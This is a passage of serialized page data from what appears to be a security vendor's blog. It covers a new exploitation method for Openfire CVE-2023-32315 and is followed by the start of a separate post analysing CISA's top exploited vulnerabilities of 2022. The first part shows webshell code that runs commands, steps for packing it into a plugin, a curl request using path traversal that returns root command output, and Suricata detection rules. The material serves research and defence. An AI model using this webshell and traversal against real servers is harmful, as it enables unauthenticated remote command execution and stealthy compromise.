47,91349,91351,91353,91355,91357,91359,91361,91364,91366,91368,91370,91372,91374,91376,91378,91380],{"class":1375,"line":1852},[1373,91331,91332],{"class":27228}," java",[1373,91334,59],{"class":1383},[1373,91336,91337],{"class":27228},"io",[1373,91339,59],{"class":1383},[1373,91341,91342],{"class":27228},"DataInputStream",[1373,91344,50864],{"class":4640},[1373,91346,5417],{"class":1397},[1373,91348,15283],{"class":4636},[1373,91350,74377],{"class":4640},[1373,91352,59],{"class":1383},[1373,91354,91337],{"class":4640},[1373,91356,59],{"class":1383},[1373,91358,91342],{"class":7297},[1373,91360,1384],{"class":1383},[1373,91362,91363],{"class":4640},"Runtime",[1373,91365,59],{"class":1383},[1373,91367,27896],{"class":7297},[1373,91369,16355],{"class":1383},[1373,91371,27901],{"class":7297},[1373,91373,1384],{"class":1383},[1373,91375,17653],{"class":4640},[1373,91377,27987],{"class":1383},[1373,91379,75285],{"class":7297},[1373,91381,16360],{"class":1383},[1373,91383,91384,91387,91390,91392,91394,91396,91398],{"class":1375,"line":4692},[1373,91385,91386],{"class":27228}," String",[1373,91388,91389],{"class":4640}," line ",[1373,91391,5417],{"class":1397},[1373,91393,57301],{"class":4640},[1373,91395,59],{"class":1383},[1373,91397,75325],{"class":7297},[1373,91399,15603],{"class":1383},[1373,91401,91402,91404,91406,91409,91411,91413,91415],{"class":1375,"line":4724},[1373,91403,4695],{"class":4636},[1373,91405,4641],{"class":1383},[1373,91407,91408],{"class":4640},"line ",[1373,91410,15677],{"class":1397},[1373,91412,15680],{"class":7054},[1373,91414,2230],{"class":1383},[1373,91416,4765],{"class":1383},[1373,91418,91419,91422,91424,91427,91429,91431,91434,91436,91438,91441],{"class":1375,"line":4756},[1373,91420,91421],{"class":4640}," response",[1373,91423,59],{"class":1383},[1373,91425,91426],{"class":7297},"setHeader",[1373,91428,1384],{"class":1383},[1373,91430,183],{"class":1387},[1373,91432,91433],{"class":1391},"X-Error",[1373,91435,183],{"class":1387},[1373,91437,5437],{"class":1383},[1373,91439,91440],{"class":4640}," line",[1373,91442,4680],{"class":1383},[1373,91444,91445],{"class":1375,"line":4768},[1373,91446,4795],{"class":1383},[1373,91448,91449,91451],{"class":1375,"line":4792},[1373,91450,28575],{"class":1383},[1373,91452,91453],{"class":1397}," %>\n",[18,91455,91456],{},"The real challenge was figuring out how to compile the thing (it probably should have been obvious, and we think we even came to a wrong conclusion… but it works). Our process roughly worked out to:",[1354,91458,91460],{"className":31740,"code":91459,"language":2186,"meta":219,"style":219},"git clone https:\u002F\u002Fgithub.com\u002Figniterealtime\u002Fopenfire-exampleplugin.git\ncd openfire-exampleplugin\ncp ..\u002Fwebshell.jsp .\u002Fsrc\u002Fmain\u002Fweb\u002Fexampleplugin-page.jsp\nmvn -B package\ncp .\u002Ftarget\u002Fexampleplugin.jar exampleplugin.zip; zip -ur exampleplugin.zip .\u002Fplugin.xml .\u002Freadme.html; mv exampleplugin.zip .\u002Ftarget\u002Fexampleplugin.jar;\n",[886,91461,91462,91473,91480,91491,91502],{"__ignoreMap":219},[1373,91463,91464,91467,91470],{"class":1375,"line":1376},[1373,91465,91466],{"class":2206},"git",[1373,91468,91469],{"class":1391}," clone",[1373,91471,91472],{"class":1391}," https:\u002F\u002Fgithub.com\u002Figniterealtime\u002Fopenfire-exampleplugin.git\n",[1373,91474,91475,91477],{"class":1375,"line":220},[1373,91476,21460],{"class":1379},[1373,91478,91479],{"class":1391}," openfire-exampleplugin\n",[1373,91481,91482,91485,91488],{"class":1375,"line":1266},[1373,91483,91484],{"class":2206},"cp",[1373,91486,91487],{"class":1391}," ..\u002Fwebshell.jsp",[1373,91489,91490],{"class":1391}," .\u002Fsrc\u002Fmain\u002Fweb\u002Fexampleplugin-page.jsp\n",[1373,91492,91493,91496,91499],{"class":1375,"line":1852},[1373,91494,91495],{"class":2206},"mvn",[1373,91497,91498],{"class":2209}," -B",[1373,91500,91501],{"class":1391}," package\n",[1373,91503,91504,91506,91509,91512,91514,91517,91520,91522,91525,91528,91530,91533,91535,91537],{"class":1375,"line":4692},[1373,91505,91484],{"class":2206},[1373,91507,91508],{"class":1391}," .\u002Ftarget\u002Fexampleplugin.jar",[1373,91510,91511],{"class":1391}," exampleplugin.zip",[1373,91513,39663],{"class":1383},[1373,91515,91516],{"class":2206}," zip",[1373,91518,91519],{"class":2209}," -ur",[1373,91521,91511],{"class":1391},[1373,91523,91524],{"class":1391}," .\u002Fplugin.xml",[1373,91526,91527],{"class":1391}," .\u002Freadme.html",[1373,91529,39663],{"class":1383},[1373,91531,91532],{"class":2206}," mv",[1373,91534,91511],{"class":1391},[1373,91536,91508],{"class":1391},[1373,91538,4912],{"class":1383},[18,91540,91541,91544],{},[886,91542,91543],{},".\u002Ftarget\u002Fexampleplugin.jar"," is then ready to be uploaded. It’s important to know that the plugin does not keep the webshell in its raw form. The webshell gets compiled into a class. So if you want to go hunting for the webshell, you have to dig much deeper than normal.",[18,91546,91547],{},[68,91548],{":width":10862,"alt":91549,"src":91550},"Openfire plugin compiled webshell in jd-gui","\u002Fblog\u002Fopenfire-cve-2023-32315\u002Fcompiled-webshell.png",[18,91552,91553],{},"Once uploaded, the plugin looks exactly like the example plugin would. The only difference is that it has our webshell in it.",[18,91555,91556],{},[68,91557],{":width":10862,"alt":91558,"src":91559},"Openfire webshell plugin uploaded","\u002Fblog\u002Fopenfire-cve-2023-32315\u002Fplugin-uploaded.png",[18,91561,91562],{},"As previously mentioned, the attacker is free to use the webshell without authentication by using the traversal. However, using the traversal causes an exception and a stack trace to be dumped to standard out, preventing the webshell from presenting any content via the HTTP response body.",[18,91564,91565],{},"Looking back at our webshell, you can see that we send all command output to an HTTP header. Which means even though accessing the webshell via the path traversal generates a huge error message, we can still execute and view arbitrary commands:",[1354,91567,91569],{"className":31740,"code":91568,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~$ curl -v \"http:\u002F\u002F10.9.49.143:9090\u002Fsetup\u002Fsetup-s\u002F%u002e%u002e\u002F%u002e%u002e\u002Fplugins\u002Fexampleplugin\u002Fexampleplugin-page.jsp?cmd=id\"\n* Trying 10.9.49.143:9090...\n* TCP_NODELAY set\n* Connected to 10.9.49.143 (10.9.49.143) port 9090 (#0)\n> GET \u002Fsetup\u002Fsetup-s\u002F%u002e%u002e\u002F%u002e%u002e\u002Fplugins\u002Fexampleplugin\u002Fexampleplugin-page.jsp?cmd=id HTTP\u002F1.1\n> Host: 10.9.49.143:9090\n> User-Agent: curl\u002F7.68.0\n> Accept: *\u002F*\n>\n* Mark bundle as not supporting multiuse\n\u003C HTTP\u002F1.1 200 OK\n\u003C Date: Fri, 18 Aug 2023 17:20:01 GMT\n\u003C X-Frame-Options: SAMEORIGIN\n\u003C Content-Type: text\u002Fhtml\n\u003C Set-Cookie: JSESSIONID=node07guewb33cw4m1va20g1n0okxd6.node0; Path=\u002F; HttpOnly\n\u003C Expires: Thu, 01 Jan 1970 00:00:00 GMT\n\u003C X-Error: uid=0(root) gid=0(root) groups=0(root)\n\u003C Content-Length: 6335\n\u003C\n",[886,91570,91571,91586,91593,91599,91612,91623,91630,91636,91648,91652,91658,91664,91671,91677,91683,91706,91712,91753,91760],{"__ignoreMap":219},[1373,91572,91573,91575,91577,91579,91581,91584],{"class":1375,"line":1376},[1373,91574,55482],{"class":2206},[1373,91576,2222],{"class":1391},[1373,91578,45584],{"class":2209},[1373,91580,4883],{"class":1387},[1373,91582,91583],{"class":1391},"http:\u002F\u002F10.9.49.143:9090\u002Fsetup\u002Fsetup-s\u002F%u002e%u002e\u002F%u002e%u002e\u002Fplugins\u002Fexampleplugin\u002Fexampleplugin-page.jsp?cmd=id",[1373,91585,19057],{"class":1387},[1373,91587,91588,91590],{"class":1375,"line":220},[1373,91589,35613],{"class":1397},[1373,91591,91592],{"class":4640}," Trying 10.9.49.143:9090...\n",[1373,91594,91595,91597],{"class":1375,"line":1266},[1373,91596,35613],{"class":1397},[1373,91598,76077],{"class":4640},[1373,91600,91601,91603,91606,91609],{"class":1375,"line":1852},[1373,91602,35613],{"class":1397},[1373,91604,91605],{"class":4640}," Connected to 10.9.49.143 (",[1373,91607,91608],{"class":2206},"10.9.49.143",[1373,91610,91611],{"class":4640},") port 9090 (#0)\n",[1373,91613,91614,91616,91618,91621],{"class":1375,"line":4692},[1373,91615,5384],{"class":1397},[1373,91617,76097],{"class":2206},[1373,91619,91620],{"class":1391}," \u002Fsetup\u002Fsetup-s\u002F%u002e%u002e\u002F%u002e%u002e\u002Fplugins\u002Fexampleplugin\u002Fexampleplugin-page.jsp?cmd=id",[1373,91622,35589],{"class":1391},[1373,91624,91625,91627],{"class":1375,"line":4724},[1373,91626,5384],{"class":1397},[1373,91628,91629],{"class":4640}," Host: 10.9.49.143:9090\n",[1373,91631,91632,91634],{"class":1375,"line":4756},[1373,91633,5384],{"class":1397},[1373,91635,35603],{"class":4640},[1373,91637,91638,91640,91642,91644,91646],{"class":1375,"line":4768},[1373,91639,5384],{"class":1397},[1373,91641,35610],{"class":4640},[1373,91643,35613],{"class":1397},[1373,91645,2180],{"class":4640},[1373,91647,35618],{"class":1397},[1373,91649,91650],{"class":1375,"line":4792},[1373,91651,6765],{"class":1397},[1373,91653,91654,91656],{"class":1375,"line":4798},[1373,91655,35613],{"class":1397},[1373,91657,76148],{"class":4640},[1373,91659,91660,91662],{"class":1375,"line":4806},[1373,91661,11852],{"class":1397},[1373,91663,89055],{"class":4640},[1373,91665,91666,91668],{"class":1375,"line":4817},[1373,91667,11852],{"class":1397},[1373,91669,91670],{"class":4640}," Date: Fri, 18 Aug 2023 17:20:01 GMT\n",[1373,91672,91673,91675],{"class":1375,"line":4825},[1373,91674,11852],{"class":1397},[1373,91676,76200],{"class":4640},[1373,91678,91679,91681],{"class":1375,"line":4835},[1373,91680,11852],{"class":1397},[1373,91682,89097],{"class":4640},[1373,91684,91685,91687,91689,91691,91694,91696,91698,91700,91702,91704],{"class":1375,"line":4843},[1373,91686,11852],{"class":1397},[1373,91688,76228],{"class":4640},[1373,91690,5417],{"class":1397},[1373,91692,91693],{"class":1391},"node07guewb33cw4m1va20g1n0okxd6.node0",[1373,91695,39663],{"class":1383},[1373,91697,76238],{"class":4640},[1373,91699,5417],{"class":1397},[1373,91701,2180],{"class":1391},[1373,91703,39663],{"class":1383},[1373,91705,76247],{"class":2206},[1373,91707,91708,91710],{"class":1375,"line":4849},[1373,91709,11852],{"class":1397},[1373,91711,76169],{"class":4640},[1373,91713,91714,91716,91719,91721,91723,91725,91727,91729,91731,91733,91735,91737,91739,91741,91743,91745,91747,91749,91751],{"class":1375,"line":4877},[1373,91715,11852],{"class":1397},[1373,91717,91718],{"class":4640}," X-Error: uid",[1373,91720,5417],{"class":1397},[1373,91722,445],{"class":1391},[1373,91724,1384],{"class":1383},[1373,91726,48771],{"class":2206},[1373,91728,2230],{"class":1383},[1373,91730,75941],{"class":4640},[1373,91732,5417],{"class":1397},[1373,91734,445],{"class":1391},[1373,91736,1384],{"class":1383},[1373,91738,48771],{"class":2206},[1373,91740,2230],{"class":1383},[1373,91742,75954],{"class":4640},[1373,91744,5417],{"class":1397},[1373,91746,445],{"class":1391},[1373,91748,1384],{"class":1383},[1373,91750,48771],{"class":2206},[1373,91752,11875],{"class":1383},[1373,91754,91755,91757],{"class":1375,"line":4915},[1373,91756,11852],{"class":1397},[1373,91758,91759],{"class":4640}," Content-Length: 6335\n",[1373,91761,91762],{"class":1375,"line":4931},[1373,91763,35662],{"class":1397},[18,91765,91766],{},"From there you can trivially pivot inward, remove the webshell, and hide within the system. All without creating the administrative user and making a mess in the log files.",[61,91768,91769],{"id":35964},"Detections",[18,91771,91772],{},"Any good attacker should know how to detect as well. VulnCheck is particularly interested in network-based detections. Detecting this attack on the wire isn’t too complicated, but there is some nuance.",[18,91774,91775,91776,91779],{},"Suricata correctly normalizes the ",[886,91777,91778],{},"%u002e%u002e\u002F"," as a path traversal. That sounds great, and naively a rule look the following rule can be crafted to detect all of the public exploits we’ve seen thus far:",[1354,91781,91784],{"className":91782,"code":91783,"language":1359},[1357],"alert http any any -> any any ( \\\n msg:\"VULNCHECK Openfire CVE-2023-32315 Exploit Attempt\"; \\\n flow:established,to_server; \\\n http.uri.raw; content:\"\u002Fsetup\u002Fsetup-s\u002F\"; startswith; \\\n http.uri; content:!\"\u002Fsetup\u002Fsetup-s\u002F\"; startswith; \\\n reference:cve,CVE-2023-32315; \\\n classtype:web-application-attack; \\\n sid:12701381; rev:1;)\n",[886,91785,91783],{"__ignoreMap":219},[18,91787,91788,91789,91792,91793,91796],{},"The problem is that it's really easy to bypass. For example, if the attacker just started the URI with ",[886,91790,91791],{},"\u002F.\u002F"," then it will break the rule. Or ",[886,91794,91795],{},"\u002Fsetup\u002F.\u002Fsetup-s\u002F",". Plenty of little tricks like that. So this “good enough” rule should really be augmented with additional rules just in case someone wants to get clever:",[1354,91798,91801],{"className":91799,"code":91800,"language":1359},[1357],"alert http any any -> any any ( \\\n msg:\"VULNCHECK Openfire CVE-2023-32315 Exploit Attempt (Account)\"; \\\n flow:established,to_server; \\\n http.uri.raw; content:\"setup\"; \\\n content:\"setup-s\"; distance: 1; \\\n content:\"%u002e\"; distance: 1; \\\n content:\"user-create.jsp\"; distance: 1; \\\n reference:cve,CVE-2023-32315; \\\n classtype:web-application-attack; \\\n sid:12701382; rev:1;)\n",[886,91802,91800],{"__ignoreMap":219},[1354,91804,91807],{"className":91805,"code":91806,"language":1359},[1357],"alert http any any -> any any ( \\\n msg:\"VULNCHECK Openfire CVE-2023-32315 Exploit Attempt (Plugin)\"; \\\n flow:established,to_server; \\\n http.uri.raw; content:\"setup\"; \\\n content:\"setup-s\"; distance: 1; \\\n content:\"%u002e\"; distance: 1; \\\n content:\"plugin-admin.jsp\"; distance: 1; \\\n reference:cve,CVE-2023-32315; \\\n classtype:web-application-attack; \\\n sid:12701383; rev:1;)\n",[886,91808,91806],{"__ignoreMap":219},[18,91810,91811],{},"Detection after exploitation is much more challenging since the attack, if done correctly, can entirely avoid the security audit log. The next best source of truth is any new\u002Funexpected plugins on the system. Generally, however, someone will need to look at that with a Java decompiler, which isn’t useful for a layperson.",[18,91813,91814,91815,91818],{},"The final source to examine is probably the ",[886,91816,91817],{},"openfire.log"," file (which might get deleted). The telltale indication of exploitation in the log file will be long stack traces associated with:",[1925,91820,91821],{},[18,91822,91823],{},"\"org.jivesoftware.openfire.user.User.getUsername()\" because the return value of \"org.jivesoftware.util.WebManager.getUser()\" is null",[61,91825,88770],{"id":88769},[18,91827,91828,91829,91831],{},"In this blog, we demonstrated a new way to exploit CVE-2023-32315. This method avoids creating an admin user and bypasses some important security logging. Given that, we identified potential areas to identify compromise (JAR file, ",[886,91830,91817],{},") and provided a general outline of what indicators to look for.",[18,91833,91834],{},"This vulnerability has already been exploited in the wild, likely even by a well-known botnet. With plenty of vulnerable internet-facing systems, we assume exploitation will continue into the future.",[61,91836,13102],{"id":13101},[18,91838,91839],{},"If you are as interested in exploits as we are, register for a VulnCheck account today by clicking “Sign in \u002F Join Community and schedule a demo to learn more.",[2901,91841,91842],{},"html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sYoWi, html code.shiki .sYoWi{--shiki-light:#E53935;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .srJo8, html code.shiki .srJo8{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sMTiH, html code.shiki .sMTiH{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .sQgqH, html code.shiki .sQgqH{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#E36209;--shiki-default-font-style:inherit;--shiki-dark:#FFAB70;--shiki-dark-font-style:inherit;--shiki-sepia:#FD971F;--shiki-sepia-font-style:italic}html pre.shiki code .sKvfc, html code.shiki .sKvfc{--shiki-light:#E2931D;--shiki-light-text-decoration:inherit;--shiki-default:#6F42C1;--shiki-default-text-decoration:inherit;--shiki-dark:#B392F0;--shiki-dark-text-decoration:inherit;--shiki-sepia:#A6E22E;--shiki-sepia-text-decoration:underline}html pre.shiki code .ss7Ak, html code.shiki .ss7Ak{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#6A737D;--shiki-default-font-style:inherit;--shiki-dark:#6A737D;--shiki-dark-font-style:inherit;--shiki-sepia:#88846F;--shiki-sepia-font-style:inherit}html pre.shiki code .s8HiA, html code.shiki .s8HiA{--shiki-light:#FF5370;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .syw9h, html code.shiki .syw9h{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#24292E;--shiki-default-font-style:inherit;--shiki-dark:#E1E4E8;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sMLJd, html code.shiki .sMLJd{--shiki-light:#6182B8;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#66D9EF}",{"title":219,"searchDepth":220,"depth":220,"links":91844},[91845,91846,91847,91848,91849,91850],{"id":11647,"depth":220,"text":11648},{"id":88414,"depth":220,"text":88415},{"id":90093,"depth":220,"text":90094},{"id":35964,"depth":220,"text":91769},{"id":88769,"depth":220,"text":88770},{"id":13101,"depth":220,"text":13102},"CVE-2023-32315 was first exploited in the wild in June 2023. However, VulnCheck has discovered an new approach to exploiting this vulnerability, streamlining the attack process and adeptly bypassing the generation of log entries. In addition, VulnCheck analyzes the remaining indicators of compromise and shares network detections.",{"slug":91853},"openfire-cve-2023-32315","\u002Fblog\u002Fopenfire-cve-2023-32315",{"title":83439,"description":91851},"blog\u002Fopenfire-cve-2023-32315",[242],"lcnEOwijSFnMO-s-jI5MkiseKX9cQ5Dwgi6HypC8Zm8",{"id":91860,"title":91861,"articles":91862,"authors":91867,"body":91869,"date":91866,"description":92117,"extension":234,"image":7,"link":7,"meta":92118,"navigation":237,"path":92123,"seo":92124,"series":7,"stem":92125,"subtype":7,"tags":92126,"__hash__":92127},"blog\u002Fblog\u002F2022-top-exploited.md","Insight into the 2022 Top Routinely Exploited Vulnerabilities VulnCheck",[91863],{"title":91864,"source":39566,"link":91865,"date":91866},"Cyberespionage on many fronts. Advanced spearphishing, CPU vulnerabilities. Ransomware and other threat trends. Patch Tuesday.","https:\u002F\u002Fthecyberwire.com\u002Fnewsletters\u002Fdaily-briefing\u002F12\u002F151","2023-08-09",[91868],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":91870,"toc":92106},[91871,91880,91883,91885,91893,91896,91899,91904,91908,91915,91923,91942,91945,91948,91951,91996,92001,92005,92008,92029,92036,92041,92045,92048,92051,92054,92059,92063,92067,92076,92096,92098,92101,92103],[18,91872,91873,91874,91879],{},"CISA, along with a cohort of cybersecurity agencies, published the ",[47,91875,91878],{"href":91876,"rel":91877},"https:\u002F\u002Fwww.cisa.gov\u002Fnews-events\u002Fcybersecurity-advisories\u002Faa23-215a",[51],"2022 Top Routinely Exploited Vulnerabilities"," on August 3, 2023. The advisory contains two lists of vulnerabilities. The first, what we’ll focus on, is the twelve most exploited vulnerabilities in 2022. Additionally, they added thirty more vulnerabilities that were “routinely” exploited.",[18,91881,91882],{},"Unfortunately, these lists lack a lot of context, which can be useful for remediation, prioritization, and detection. Details like: are there public exploits? Are the issues being used by ransomware? Threat actors? DDOS botnets? In this blog, we’ll dig deeper into the top twelve CVEs and provide some much-needed context.",[61,91884,60799],{"id":61495},[18,91886,91887,91888,59],{},"Perhaps unsurprisingly, the twelve most exploited vulnerabilities are very well-known. Most were well-known before we even got to the year 2022, with the earliest dating back to 2018. Seven of the vulnerabilities were included in CISA’s ",[47,91889,91892],{"href":91890,"rel":91891},"https:\u002F\u002Fwww.cisa.gov\u002Fnews-events\u002Fcybersecurity-advisories\u002Faa22-117a",[51],"2021 Top Routinely Exploited Vulnerabilities",[18,91894,91895],{},"Given all the effort poured into awareness, detection, and remediation, how is it that the same vulnerabilities are repeated year to year? CISA does not discuss their methodology, nor do they clarify what they mean by exploited: exploit attempt or successful exploitation? If it’s the former, this is a “good to know'' list that isn’t too concerning. If it’s the latter, the security industry has failed to protect its customers from obvious and widely known threats for two years in a row.",[18,91897,91898],{},"Nothing about these vulnerabilities is a secret. The issues are particularly well-known to the exploit development community.",[1925,91900,91901],{},[18,91902,91903],{},"Where to Find Exploits for the Top 12 Exploited CVE",[11128,91905],{":labels":91906,":values":91907},"[\"Metasploit\",\"GitHub, GitLab, Gitee\",\"Nuclei\",\"Commerical\"]","[12,12,8,9]",[18,91909,91910,91911,59],{},"All twelve have available exploits. All twelve have weaponized exploits in Metasploit, as well as various one-off implementations across ",[47,91912,91914],{"href":72091,"rel":91913},[51],"GitHub, GitLab, Gitee, etc",[18,91916,91917,91918,91922],{},"Eight of the twelve have ",[47,91919,22175],{"href":91920,"rel":91921},"https:\u002F\u002Fnuclei.projectdiscovery.io\u002Fnuclei\u002Fget-started\u002F",[51]," templates. Nuclei has made scanning the internet for known vulnerabilities easy, so it’s useful to know which vulnerabilities the Nuclei community has created templates for.",[18,91924,91925,91926,1246,91931,91936,91937,91941],{},"To our knowledge, nine of the vulnerabilities have commercially available exploits. Commercial exploits are typically more customized, highly weaponized, and developed for valuable targets in real-world situations. The fact that exploits were added to commercial exploit products like ",[47,91927,91930],{"href":91928,"rel":91929},"https:\u002F\u002Fwww.coresecurity.com\u002Fcore-labs\u002Fexploits",[51],"Core",[47,91932,91935],{"href":91933,"rel":91934},"https:\u002F\u002Fimmunityinc.com\u002Fproducts\u002Fcanvas\u002F",[51],"CANVAS",", and VulnCheck’s ",[47,91938,91940],{"href":45535,"rel":91939},[51],"Initial Access"," indicates these targets weren’t just prevalent in the wild, but also provided valuable access.",[61,91943,91944],{"id":22200},"Attackers",[18,91946,91947],{},"The top twelve vulnerabilities are associated with a slew of attackers. All twelve have been exploited by threat actors, ten are associated with ransomware, and nine are associated with botnets.",[993,91949,331],{"id":91950},"ransomware",[18,91952,91953,91954,1246,91959,1255,91964,91968,91969,4641,91974,1246,91979,1255,91984,91989,91990,91995],{},"Our data shows the vulnerabilities are used by more than 30 different ransomware groups, including ",[47,91955,91958],{"href":91956,"rel":91957},"https:\u002F\u002Fwww.ic3.gov\u002FMedia\u002FNews\u002F2022\u002F220318.pdf",[51],"AvosLocker",[47,91960,91963],{"href":91961,"rel":91962},"https:\u002F\u002Fwww.cisa.gov\u002Fnews-events\u002Fcybersecurity-advisories\u002Faa23-165a",[51],"Lockbit",[47,91965,32702],{"href":91966,"rel":91967},"https:\u002F\u002Fwww.cisa.gov\u002Fsites\u002Fdefault\u002Ffiles\u002Fpublications\u002F202103231400_Analyst_Note_CL0P_TLP_WHITE.pdf",[51],". The most popular CVEs were the ",[47,91970,91973],{"href":91971,"rel":91972},"https:\u002F\u002Fwww.mandiant.com\u002Fresources\u002Fblog\u002Fpst-want-shell-proxyshell-exploiting-microsoft-exchange-servers",[51],"ProxyShell chain",[47,91975,91978],{"href":91976,"rel":91977},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002Fcve-2021-34473",[51],"CVE-2021-34473",[47,91980,91983],{"href":91981,"rel":91982},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2021-34523",[51],"CVE-2021-34523",[47,91985,91988],{"href":91986,"rel":91987},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2021-31207",[51],"CVE-2021-31207",") which was widely used against Exchange servers when it popped onto the scene in 2021. The next most popular was ",[47,91991,91994],{"href":91992,"rel":91993},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2021-26084",[51],"CVE-2021-26084",", which is an easy to exploit issue in Confluence that was initially exploited in the wild as a zero day.",[1925,91997,91998],{},[18,91999,92000],{},"Top 12 Exploited CVE Most Used by Ransomware Groups (Groups per CVE)",[11128,92002],{":labels":92003,":values":92004},"[\"CVE-2021-34473\",\"CVE-2021-34523\",\"CVE-2021-31207\",\"CVE-2021-26084\",\"CVE-2018-13379\",\"CVE-2021-44228\"]","[13,13,13,9,6,6]",[993,92006,328],{"id":92007},"threat-actors",[18,92009,92010,92011,92016,92017,92022,92023,92028],{},"The vulnerabilities have been exploited by more than 60 different groups. The most popular “group” in our ranking is “Unattributed” (twelve vulnerabilities out of twelve), followed by the generic “Chinese-nexus” (six out of twelve), before getting into more well-known groups like ",[47,92012,92015],{"href":92013,"rel":92014},"https:\u002F\u002Fthehackernews.com\u002F2022\u002F09\u002Fsparklinggoblin-apt-hackers-using-new.html",[51],"SparklingGoblin"," (five out of twelve), ",[47,92018,92021],{"href":92019,"rel":92020},"https:\u002F\u002Fmalpedia.caad.fkie.fraunhofer.de\u002Factor\u002Fcharming_kitten",[51],"Charming Kitten"," (five out of twelve), and ",[47,92024,92027],{"href":92025,"rel":92026},"https:\u002F\u002Fmalpedia.caad.fkie.fraunhofer.de\u002Factor\u002Fdev-0270",[51],"Nemesis Kitten"," (four out of twelve).",[18,92030,92031,92032,92035],{},"Threat actors have a reputation of using advanced techniques and zero-day vulnerabilities, but many are opportunistic attackers as well. 22 threat actors are known to have exploited ",[47,92033,61923],{"href":83629,"rel":92034},[51]," (Log4Shell), and 18 reportedly used the ProxyShell chain.",[1925,92037,92038],{},[18,92039,92040],{},"Top 12 Exploited CVE Most Used by Threat Actors (Actors per CVE)",[11128,92042],{":labels":92043,":values":92044},"[\"CVE-2021-44228\",\"CVE-2021-34473\",\"CVE-2022-30190\",\"CVE-2021-31207\",\"CVE-2021-34523\",\"CVE-2018-13379\",\"CVE-2022-26134\",\"CVE-2022-22954\"]","[22,18,17,16,16,9,6,6]",[993,92046,44260],{"id":92047},"botnets",[18,92049,92050],{},"Surprisingly, we see much less botnet activity compared to the other two categories. Botnets, of course, are well known for throwing exploits all around the internet. Their volume of exploitation should be higher than, for example, a more targeted threat actor group. Nonetheless, our data indicates that nine of the twelve vulnerabilities are associated with botnets. The most popular, of course, is Mirai (four out of twelve), followed by ProxyShellMiner (three out of twelve), Kinsing, Muhstik, BillGates, and Enemybot (all 